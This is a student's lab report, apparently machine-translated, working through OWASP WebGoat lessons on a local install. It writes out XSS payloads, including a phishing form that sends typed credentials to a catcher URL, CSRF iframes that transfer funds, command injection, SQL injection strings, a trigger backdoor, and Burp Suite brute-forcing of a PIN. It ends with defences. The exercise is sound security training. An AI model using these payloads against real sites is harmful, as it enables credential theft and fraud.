#20155232 "Cyber Confrontation" EXP9 Web Security Foundation

20155232 "Cyber Confrontation" EXP9 Web Security Foundation

The objective of this practice is to understand the basic principles of commonly used network attack techniques. Webgoat the experiment in practice.

Experimental process Webgoat

Webgoat is a web-based vulnerability experiment developed by the OWASP organization, which contains a variety of vulnerabilities commonly found in the web, such as cross-site scripting attacks, SQL injection, access control, hidden fields, cookies, etc.

OWASP (Open Web application Security Project) is a nonprofit organization that is designed to help individuals and businesses discover and use trustworthy software.

• Webgoat is divided into simple version and Development Board, the simple version is a Java jar package, only need to have a Java environment, we execute on the command line:

  java -jar webgoat-container-7.0.1-war-exec.jar

  Run Webgoat:

• Webgoat uses 8080 ports, so access on the browser

Note W G uppercase.

localhost:8080/WebGoat

After entering the webgoat, you can see that there are many topics for us to practice:

Cross-site Scripting Practice phishing with XSS

This is a cross-site scripting phishing attack that requires the use of XSS attack code in the search box and the ability to further add elements to existing pages using XSS

Create a form that allows the victim to fill in the user name and password in the created form, add a piece of JavaScript code, read the username and password entered by the victim, and send the message to http://localhost:8080/WebGoat/ Catcher? Property=yes ...,

</form><script>    function hack(){         XSSImage=new Image;        XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";        alert(".....your information was stolen by lsq! User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);    } </script><form name="phish"><br><br><HR>    <H2>please input your information here:</H2><br>    <br>Enter Username:<br>    <input type="text" name="user">    <br>Enter Password:<br>    <input type="password" name = "pass"><br>    <input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>

• Enter the username password, click Login, Webgoat will capture the information you entered and feedback to you:
  

• Successful attack ~ ~ ~ ..... ：
  

Stored XSS Attacks

• Storage-type XSS attack: XSS attack code is stored in the database, every time when the user opens this page will be executed, harmful, often words message board, every time when the user view message information is triggered. Loading unexpected pages or content when users visit

• Enter some content in the title freely.

• Then enter a string of code in the message, such as:

  <script>alert(" you have been attacked by lsq !!");</script>

• When the user clicks the post you just created in the forum:
  

• The attack was successful:
  

Reflected XSS Attacks

• What is the difference between a storage-type XSS and a reflective XSS?

Storage-type XSS, persistence, code is stored in the server, such as in the personal information or published articles, such as the addition of code, if not filtering or filtering is not strict, then the code will be stored in the server, the user access to the page triggered code execution. This XSS is more dangerous, prone to worms, theft of cookies and so on.

Reflective XSS, non-persistent, you need to deceive users to click the link to trigger the XSS code (the server does not have such a page and content), generally easy to appear in the search page.

• Here's a concrete explanation of the practice:

Validating all inputs on the server side is always a good practice. XSS can occur when an unauthenticated user input is used in an HTTP response. In a reflected XSS attack, an attacker could use an attack script to make a URL and post it to another website, send an e-mail message, or otherwise have the victim click on it.

• When we enter the wrong user information, the server check input is wrong, return the error page and show us the error content:
  

• If we have an offensive URL as the input source, for example, the input is still

  <script>alert(" you have been attacked by lsq !!!");</script>

  , a dialog box pops up:

Cross Site Request forgery (CSRF)

The goal here is to send an e-mail message to newsgroups. The e-mail message contains an image whose URL points to a malicious request. In this lesson, the URL should point to the "attack" Servlet, which has a "screen" and "menu" parameter and an extra parameter "Trimefund" with any number, such as 5000. You can build a link by finding the "screen" and "menu" values in the parameters that are inserted on the right. Recipients of CSRF Mail that were certified at that time will transfer their funds. When the attack on this lesson succeeds, a green check mark appears next to the menu on the left.

• Put the URL in the form of a picture in the message box, when the URL is not visible to other users, once the user clicks on the image, it will trigger a CSRF event.

• We enter such a string of code in the message box

Note that the screen and menu values for each person's computer may not be the same, you can have a parameters on the right side of the current page to view, and then set the width to 1 pixels, hide the image.

• After submission, you will see a new message in the message list, click on the message, the current page will download the message and display it, the user's 5000 yuan, so as to achieve the purpose of CSRF attack.

CSRF Prompt By-Pass

The goal is to send an e-mail message to a newsgroup that contains multiple malicious requests: the first transfer funds, and the second request confirms the prompt that the first request was triggered. The URL should point to this CSRF hint's attack servlet, pass the Pass Course's screen, menu parameters, and an extra parameter "Trimeboover", which has a numeric value such as "5000" to start a transmission, and a string value "confirm" to complete it. You can copy the course's parameters from the illustration on the right, creating a URL in the "Attack" format. screen = xxx and menu = yyy and transfer funds = ZZZ ". Whoever receives this email happens to be certified at that time and his funds will be transferred. When you think the attack is successful, refresh the page and you will find the green check in the left menu

• View the SRC and menu values in the parameters on the right side of the page.
  

• Add the code in the message:

<iframe src="attack?Screen=src值&menu=menu值&transferFunds=转账数额"> </iframe><iframe src="attack?Screen=src值&menu=menu值&transferFunds=CONFIRM"> </iframe>

• Submit the form into a link and click:
  

Or!

• Manually entering URLs in the browser

  localhost:8080/WebGoat/attack?Screen=266&menu=900&transferFunds=5000

  Enter the confirmation transfer request page:
  

• After clicking the Confirm button, enter the URL in the browser:

  localhost:8080/WebGoat/attack?Screen=266&menu=900&transferFunds=CONFIRM

  The successful transfer of 5000 yuan:
  

Injection flaws Practice

SQL injection attacks pose a serious threat to any database-driven site. The method behind the attack is easy to learn, resulting in compromises that can be made from quite large to complete systems. Despite these risks, the incredible number of systems on the Internet is susceptible to this form of attack.

It is also good practice to clean up all input data, especially data used in OS commands, scripts, and database queries, in some other way, to block the threat of SQL injection.

Command Injection

• Execute the system command on the target host, modify the source code by Firebug under Firefox, and add the Backdoors.help next to the

  "& netstat -an & ipconfig"

• You can then see our modified values in the drop-down menu:
  

• Select the modified value and point to view, you can see the command is executed, the system network connection situation:
  

Numeric SQL Injection

• Title Requirements:
  The following form allows users to view weather data. Attempt to inject an SQL string that causes all weather data to be displayed.
  Now that you have successfully executed SQL injection, try the same type of attack on the parameterized query.

• Add a 1=1 This kind of eternity can achieve our goal, still use Firebug, in any value such as 101 next to add or 1=1:

• Check Columbia, click Go, Show:

Log Spoofing

• The user name we entered will be appended to the log file, so we can use a decoy to use a user named "admin" in the log to display "successful login" in the User Name text box to enter

  lsq%0d%0aLogin Succeeded for username: admin

  Where%0d is the carriage return,%0a is the newline character:

• , the attack succeeds:
  

String SQL Injection

• Here, as before, constructs the SQL injection string based on the SELECT statement, and in the text box, enter

  ‘ or 1=1 --

  The first semicolon is used to close the first semicolon of the last_name, and the second semicolon is used to close the second semicolon of the last_name. A statement is forcibly split into two statements.
  

• Click Go, the attack succeeds and all user information is displayed:
  

Lab:sql Injection (Stage 1:string SQL injection)

• Log in as user Larry and enter in the password field

  ‘ or 1=1 --

  SQL injection, but login failed:
  

• Look at the page code and find that the length set here is not enough. Then make the changes:
  

• Success HA:
  

SQL injection (Stage 3:numeric SQL injection)

• Follow the same method as before, then click Viewprofile to view the employee information:
  

• Using inspect to analyze this button, and found that this place is the employee ID as an index to pass the parameters, we have to reach through Larry to browse the Boss account information, the boss should generally pay the highest salary, so the value of the values to be changed to

  101 or 1=1 order by salary desc --

  Here desc refers to the salary in descending order, so that the boss's information will be ranked first.
  

• You can then view information about your boss:
  

Database backdoors

• First lose a 101, get the user's information:

• Input INJECTION statement:

101; update employee set salary=90000

The user's salary has risen to 90000:

• Then use the statement

  101;CREATE TRIGGER lsqBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email=‘[email protected]‘ WHERE userid = NEW.userid

Blind Numeric SQL Injection

• Our goal is to find the value of the Pin field in the record in the pins table with a value of 1111222233334444 in the Cc_number field, as you can tell from the information returned from the service-side page, that it only tells you two kinds of information: The account number is valid or invalid, we can enter the statement first

  101 AND ((SELECT pin FROM pins WHERE cc_number=‘1111222233334444‘) > 10000 );

  See if the pin value is greater than 10000
  

• Then determine between 2000 and 2500, then open the Burpsuite.

• Set up:

• Start Burpsuite
  

• Set the options option for proxy "proxy"
  The default is 8080 ports are occupied when you need to add a new port 5232, click Add

• After you add the check box,
  

• Set the proxy for the browser

• Open the "More" tab on the right side of the browser to find Preference-advanced-settings

When Burpsuite is treated as an intermediary server, each packet flows through it. Once set, go back to the topic, choose one of them, click Go, then go back to Burpsuite. Discover more captured packages:

• In positions, select Sniper mode, then use the cursor to select the variable that requires brute force, here is the value after Account_number, then click Add on the right (click Clear to clear All)
  
  

• In payloads, select type number, and then set the change range of 2000-2500 and set the step size to 1

• In the options, select Start Attack to start the attack
  

Find the location of the packet size change here 2364, with 2364 try:

After shutting down the Burpsuite, the browser agent is recalled not to use the proxy, or the browser can not network

Answer questions after the experiment

(1) SQL injection attack principle, how to defend

A SQL injection attack is the goal of tricking a server into executing a malicious SQL command by inserting a SQL command into a Web form to submit or entering a query string for a domain name or page request.

1, the ordinary user and the system administrator user's permission to have the strict distinction.

2, forcing the use of parameterized statements.

3, strengthen the validation of user input.

4. Use the security parameters that are available from the SQL Server database.

5. Use regular expressions to filter incoming parameters and filter for some keywords that contain SQL injection.

6. Call this function in the JSP to check if it contains illegal characters and prevent SQL from being injected from the URL.

(2) The principle of XSS attack, how to defend

XSS attacks are one of the most common attack methods in web attacks by injecting executable code into Web pages and successfully being browser-
execution, to achieve the purpose of the attack, form an effective XSS attack, once the attack succeeds, it can get the user's contact column
Table, and then send a fake scam message to the contact, you can delete the user's log, and so on.

1. Filter the required parameters before the form submission or URL parameters are passed.

2, filter user input to check the contents of user input whether there is illegal content. such as <> (angle brackets), "(quotation marks), ' (single quotation marks),% (percent sign),; (semicolon), () (parentheses), & (& symbol), + (plus sign), and so on. Strict control of output

(3) CSRF attack principle, how to defend

Cross-site request forgery, theft of identity to send malicious requests.

1. Verify the HTTP Referer field

2. Add token to the request address and verify

3. Customize the properties in the HTTP header and verify

Experiment Summary and experience

This experiment is very interesting, the topic will be combined with some practical examples, to attack. Also learned a lot of attack types, more in-depth understanding of a lot. In the use of Burpsuite capture package for source modification method, encountered a lot of problems, this software is English version, so use up really very laborious, read a lot of seniors learn elder sister's blog, just slowly piece together, slowly learn to use. Another way to directly use Firebug to modify the Web page source code, it is easier to some, but the scope of the available will be a little bit smaller.

#20155232 "Cyber Confrontation" EXP9 Web Security Foundation